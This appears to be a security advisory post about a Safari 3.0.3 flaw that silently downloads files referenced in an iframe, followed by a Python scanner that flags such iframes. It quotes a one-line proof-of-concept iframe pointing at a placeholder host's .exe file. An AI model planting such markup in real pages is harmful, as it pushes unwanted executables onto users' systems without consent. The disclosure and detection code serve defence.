A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.
True enough, we have found that the Safari version 3.0.3 (522.15.5) Web browser for Windows automatically downloads a file referenced in an IFRAME tag on a site, for example:
<iframe src="http://www.XXXX.com/XXXX.exe" name="iframe" id="iframe"></iframe>

Unlike IE and Firefox, which display an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any notification.

A behind-the-scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.

The flaw has potential for misuse and may become a source of violations of users' rights, since it lets entities download files onto a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.
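A defender-side check for the pattern described above, as an added example that is not part of the original post: it scans page HTML for iframe/frame elements whose source resolves to an executable file, the case Safari 3.0.3 fetched without a prompt. The extension list, the sample markup and the example.com hosts are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, unquote
import posixpath

# Assumption: extensions treated as directly runnable on Windows (not from the post).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".msi"}
FRAME_TAGS = {"iframe", "frame"}


class FrameDownloadScanner(HTMLParser):
    """Collects iframe/frame sources that resolve to an executable file."""

    def __init__(self, base_url):
        super().__init__(convert_charrefs=True)
        self.base_url = base_url
        self.findings = []  # (tag, absolute_url, line_number)

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        src = dict(attrs).get("src")
        if tag not in FRAME_TAGS or not src:
            return
        absolute = urljoin(self.base_url, src.strip())
        parts = urlsplit(absolute)
        if parts.scheme not in ("http", "https"):
            return
        # Decode %2E-style escapes; the query string and fragment are ignored.
        ext = posixpath.splitext(unquote(parts.path))[1].lower()
        if ext in EXECUTABLE_EXTS:
            self.findings.append((tag, absolute, self.getpos()[0]))


def scan_html(html, base_url):
    scanner = FrameDownloadScanner(base_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page; hosts and file names are placeholders.
SAMPLE = """<html><body>
<iframe src="http://www.example.com/setup.exe" name="iframe" id="iframe"></iframe>
<IFRAME SRC='/files/Update%2EEXE?id=7'></IFRAME>
<iframe src="http://www.example.com/news.html"></iframe>
<a href="http://www.example.com/tool.exe">manual download</a>
</body></html>"""

if __name__ == "__main__":
    for tag, url, line in scan_html(SAMPLE, "http://www.example.com/page.html"):
        print(f"line {line}: <{tag}> loads executable {url}")
```

A content filter or crawler could run `scan_html` over fetched pages; ordinary links to executables are deliberately not flagged, because they require a click rather than loading with the page.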
Additional information provided by Leander Yu.